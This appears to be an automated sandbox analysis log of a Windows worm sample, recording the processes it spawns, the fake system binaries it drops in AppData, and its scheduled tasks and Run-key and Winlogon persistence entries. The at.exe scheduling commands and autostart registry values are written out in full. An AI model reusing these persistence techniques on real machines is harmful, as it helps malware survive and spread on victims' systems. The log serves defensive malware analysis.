                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeFile created: C:\Users\user\AppData\Local\Temp\~DF6EFAC80E34D11BD1.TMP
                  Source: C:\Users\user\AppData\Local\lsass.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\BronNetDomList.bat
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeFile read: C:\Users\desktop.ini
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: Pedang @ P#U00ecsau.exeReversingLabs: Detection: 100%
                  Source: Pedang @ P#U00ecsau.exeVirustotal: Detection: 95%
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeFile read: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exe
                  Source: unknownProcess created: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exe "C:\Users\user\Desktop\Pedang @ P#U00ecsau.exe"
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeProcess created: C:\Windows\SysWOW64\explorer.exe explorer.exe
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeProcess created: C:\Users\user\AppData\Local\smss.exe C:\Users\user\AppData\Local\smss.exe
                  Source: C:\Users\user\AppData\Local\smss.exeProcess created: C:\Users\user\AppData\Local\winlogon.exe C:\Users\user\AppData\Local\winlogon.exe
                  Source: C:\Users\user\AppData\Local\smss.exeProcess created: C:\Windows\SysWOW64\at.exe at /delete /y
                  Source: C:\Windows\SysWOW64\at.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\smss.exeProcess created: C:\Windows\SysWOW64\at.exe at 17:08 /every:M,T,W,Th,F,S,Su "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\8592-NendangBro.com"
                  Source: C:\Windows\SysWOW64\at.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\smss.exeProcess created: C:\Windows\SysWOW64\at.exe at 11:03 /every:M,T,W,Th,F,S,Su "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\8592-NendangBro.com"
                  Source: C:\Users\user\AppData\Local\smss.exeProcess created: C:\Users\user\AppData\Local\services.exe C:\Users\user\AppData\Local\services.exe
                  Source: C:\Windows\SysWOW64\at.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\smss.exeProcess created: C:\Users\user\AppData\Local\lsass.exe C:\Users\user\AppData\Local\lsass.exe
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeProcess created: C:\Windows\SysWOW64\explorer.exe explorer.exe
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeProcess created: C:\Users\user\AppData\Local\smss.exe C:\Users\user\AppData\Local\smss.exe
                  Source: C:\Users\user\AppData\Local\smss.exeProcess created: C:\Users\user\AppData\Local\winlogon.exe C:\Users\user\AppData\Local\winlogon.exe
                  Source: C:\Users\user\AppData\Local\smss.exeProcess created: C:\Windows\SysWOW64\at.exe at /delete /y
                  Source: C:\Users\user\AppData\Local\smss.exeProcess created: C:\Windows\SysWOW64\at.exe at 17:08 /every:M,T,W,Th,F,S,Su "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\8592-NendangBro.com"
                  Source: C:\Users\user\AppData\Local\smss.exeProcess created: C:\Windows\SysWOW64\at.exe at 11:03 /every:M,T,W,Th,F,S,Su "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\8592-NendangBro.com"
                  Source: C:\Users\user\AppData\Local\smss.exeProcess created: C:\Users\user\AppData\Local\services.exe C:\Users\user\AppData\Local\services.exe
                  Source: C:\Users\user\AppData\Local\smss.exeProcess created: C:\Users\user\AppData\Local\lsass.exe C:\Users\user\AppData\Local\lsass.exe
                  Source: C:\Users\user\AppData\Local\lsass.exeProcess created: C:\Users\user\AppData\Local\inetinfo.exe C:\Users\user\AppData\Local\inetinfo.exe
                  Source: C:\Users\user\AppData\Local\lsass.exeProcess created: C:\Users\user\AppData\Local\svchost.exe C:\Users\user\AppData\Local\svchost.exe
                  Source: C:\Users\user\AppData\Local\lsass.exeProcess created: C:\Users\user\AppData\Local\inetinfo.exe C:\Users\user\AppData\Local\inetinfo.exe
                  Source: C:\Users\user\AppData\Local\lsass.exeProcess created: C:\Users\user\AppData\Local\svchost.exe C:\Users\user\AppData\Local\svchost.exe
                  Source: C:\Users\user\AppData\Local\lsass.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\BronNetDomList.bat
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\lsass.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\BronNetDomList.bat
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeSection loaded: msvbvm60.dll
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeSection loaded: vb6zz.dll
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeSection loaded: sxs.dll
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeSection loaded: wldp.dll
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeSection loaded: profapi.dll
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeSection loaded: propsys.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: profapi.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: edputil.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: apphelp.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: appresolver.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: bcp47langs.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: slc.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sppc.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: starttiledata.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: structuredquery.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: mswb7.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.globalization.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: bcp47mrm.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: icu.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.search.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: explorerframe.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: actxprxy.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wintypes.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.staterepositoryps.dll
                  Source: C:\Users\user\AppData\Local\smss.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\smss.exeSection loaded: msvbvm60.dll
                  Source: C:\Users\user\AppData\Local\smss.exeSection loaded: vb6zz.dll
                  Source: C:\Users\user\AppData\Local\smss.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\smss.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\smss.exeSection loaded: sxs.dll
                  Source: C:\Users\user\AppData\Local\smss.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\smss.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\smss.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\smss.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\winlogon.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\winlogon.exeSection loaded: msvbvm60.dll
                  Source: C:\Users\user\AppData\Local\winlogon.exeSection loaded: vb6zz.dll
                  Source: C:\Users\user\AppData\Local\winlogon.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\winlogon.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\winlogon.exeSection loaded: sxs.dll
                  Source: C:\Users\user\AppData\Local\winlogon.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\winlogon.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\winlogon.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\winlogon.exeSection loaded: propsys.dll
                  Source: C:\Windows\SysWOW64\at.exeSection loaded: schedcli.dll
                  Source: C:\Windows\SysWOW64\at.exeSection loaded: netutils.dll
                  Source: C:\Windows\SysWOW64\at.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\at.exeSection loaded: msv1_0.dll
                  Source: C:\Windows\SysWOW64\at.exeSection loaded: ntlmshared.dll
                  Source: C:\Windows\SysWOW64\at.exeSection loaded: cryptdll.dll
                  Source: C:\Windows\SysWOW64\at.exeSection loaded: schedcli.dll
                  Source: C:\Windows\SysWOW64\at.exeSection loaded: netutils.dll
                  Source: C:\Windows\SysWOW64\at.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\at.exeSection loaded: msv1_0.dll
                  Source: C:\Windows\SysWOW64\at.exeSection loaded: ntlmshared.dll
                  Source: C:\Windows\SysWOW64\at.exeSection loaded: cryptdll.dll
                  Source: C:\Windows\SysWOW64\at.exeSection loaded: schedcli.dll
                  Source: C:\Windows\SysWOW64\at.exeSection loaded: netutils.dll
                  Source: C:\Windows\SysWOW64\at.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\at.exeSection loaded: msv1_0.dll
                  Source: C:\Windows\SysWOW64\at.exeSection loaded: ntlmshared.dll
                  Source: C:\Windows\SysWOW64\at.exeSection loaded: cryptdll.dll
                  Source: C:\Users\user\AppData\Local\services.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\services.exeSection loaded: msvbvm60.dll
                  Source: C:\Users\user\AppData\Local\services.exeSection loaded: vb6zz.dll
                  Source: C:\Users\user\AppData\Local\services.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\services.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\services.exeSection loaded: sxs.dll
                  Source: C:\Users\user\AppData\Local\services.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\services.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\services.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\services.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: msvbvm60.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: vb6zz.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: sxs.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: adsnt.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: activeds.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: adsldpc.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: adsldpc.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: browcli.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: cscapi.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: msvbvm60.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: vb6zz.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: sxs.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: msvbvm60.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: vb6zz.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: sxs.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: wsock32.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: napinsp.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: pnrpnsp.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: wshbth.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: nlaapi.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: winrnr.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: wininet.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: schannel.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: mskeyprotect.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: ntasn1.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: dpapi.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: gpapi.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: ncrypt.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: ncryptsslp.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: wsock32.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: napinsp.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: pnrpnsp.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: wshbth.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: nlaapi.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: winrnr.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: wininet.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: schannel.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: mskeyprotect.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: ntasn1.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: dpapi.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: gpapi.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: ncrypt.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: ncryptsslp.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: wsock32.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: napinsp.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: pnrpnsp.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: wshbth.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: nlaapi.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: winrnr.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: wininet.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: schannel.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: mskeyprotect.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: ntasn1.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: dpapi.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: gpapi.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: ncrypt.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: ncryptsslp.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeFile written: C:\Users\user\AppData\Local\BronMesPedang @ P#U00ecsau.ini
                  Source: initial sampleStatic PE information: section where entry point is pointing to: u
                  Source: Pedang @ P#U00ecsau.exeStatic PE information: section name: BLDF
                  Source: Pedang @ P#U00ecsau.exeStatic PE information: section name: u

                  Persistence and Installation Behavior

                  barindex
                  Drops PE files with a suspicious file extension
                  Source: C:\Users\user\AppData\Local\smss.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Empty.pifJump to dropped file
                  Sample is not signed and drops a device driver
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeFile created: C:\Windows\SysWOW64\sistem.sys
                  Source: C:\Users\user\AppData\Local\smss.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Empty.pifJump to dropped file

                  Boot Survival

                  barindex
                  Creates an autostart registry key pointing to binary in C:\Windows
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Creates an undocumented autostart registry key
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                  Creates autostart registry keys with suspicious names
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus-2091
                  Creates multiple autostart registry keys
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus-2091
                  Uses schtasks.exe or at.exe to add and modify task schedules
                  Source: C:\Users\user\AppData\Local\smss.exeProcess created: C:\Windows\SysWOW64\at.exe at /delete /y
                  Source: C:\Users\user\AppData\Local\smss.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Empty.pif
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus-cfhnmoox
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus-cfhnmoox
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus-2091
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus-2091
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\smss.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\smss.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\smss.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\smss.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
